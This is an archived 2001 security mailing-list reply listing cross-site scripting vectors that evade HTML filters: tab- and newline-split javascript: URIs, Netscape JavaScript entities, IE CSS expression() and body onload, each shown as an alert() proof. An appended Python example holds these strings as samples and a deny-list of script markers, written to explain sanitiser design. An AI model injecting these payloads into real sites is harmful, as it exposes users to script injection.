From: Sverre H. Huseby (shh thathost.com)
Date: Tue Oct 23 2001 - 13:58:27 CDT
[Jeremiah Grossman]
| <IMG SRC="javascript:javascript_expression">
And both Netscape and IE accept the following variations with white
space:
<img src="java
script:alert('script');">
<img src="java	script:alert('script');">
| <IMG SRC="&{javascript_expression};">
That stupid Netscape JavaScript Entity works almost everywhere, like
in
<br size="&{alert('script');};">
And there are more: IE runs script code when given the following
constructs:
<p style="left:expression(eval('alert(\'script\')'))">
<style type="text/css">
import url(javascript:alert('script'));</style>
Netscape, Mozilla and MSIE allow body tags anywhere, to be nice I
guess, but the problem is that body tags may contain scripts too:
<body onload="alert('script')">
I guess there are plenty more. And I guess every browser (yes, there
are more than Netscape and MSIE) has additional peculiarities (how do
you spell that word?) too. Who said secure web development was
supposed to be easy? Allowing some HTML tags without allowing
scripting is extremely difficult. I've never dared to implement it.
Sverre.
--
shh thathost.com
Play my free Nerd Quiz at http://nerdquiz.thathost.com/
http://shh.thathost.com/
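As an added example (not code from the message or its author), a small Python filter run over constructed attribute values modelled on the variants quoted above: it shows why a literal `javascript:` prefix check misses the whitespace-split forms, and how normalising the value the way the browser does before checking, or better, allowing only known schemes, handles every variant in the message.

```python
import html
import re

# Constructed sample attribute values, modelled on the variants quoted in the
# message above; the browser quirks are the message's, the inputs are made up here.
SAMPLES = {
    "plain":    "javascript:alert('script')",
    "newline":  "java\nscript:alert('script')",
    "tab":      "java\tscript:alert('script')",
    "entity":   "&{alert('script');};",
    "css_expr": "left:expression(eval('alert(\\'script\\')'))",
    "benign":   "http://example.invalid/pic.png",
}

# Control characters and whitespace that the quoted browsers skip inside a scheme.
_SKIPPED = re.compile(r"[\x00-\x20]")
# Markers for the three script carriers named in the message.
_SCRIPT_MARKERS = ("javascript:", "&{", "expression(")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")


def naive_is_script(value: str) -> bool:
    """A literal prefix match, the check the whitespace variants slip past."""
    return value.lower().startswith("javascript:")


def normalize(value: str) -> str:
    """Decode entities, drop skipped characters and lower-case: roughly what the browser sees."""
    return _SKIPPED.sub("", html.unescape(value)).lower()


def is_script(value: str) -> bool:
    """Deny-list applied after normalisation; catches each variant quoted in the message."""
    normalized = normalize(value)
    return any(marker in normalized for marker in _SCRIPT_MARKERS)


def is_safe_url(value: str) -> bool:
    """Allow-list for URL attributes: relative paths or http(s) only, never a JS entity."""
    normalized = normalize(value)
    if "&{" in normalized:
        return False
    match = _SCHEME.match(normalized)
    if match is None:          # no scheme at all: a relative URL
        return True
    return match.group(1) in ("http", "https")
```

`naive_is_script` rejects only the plain form; `is_script` rejects all five script-carrying samples, and `is_safe_url` accepts only the benign URL and relative paths.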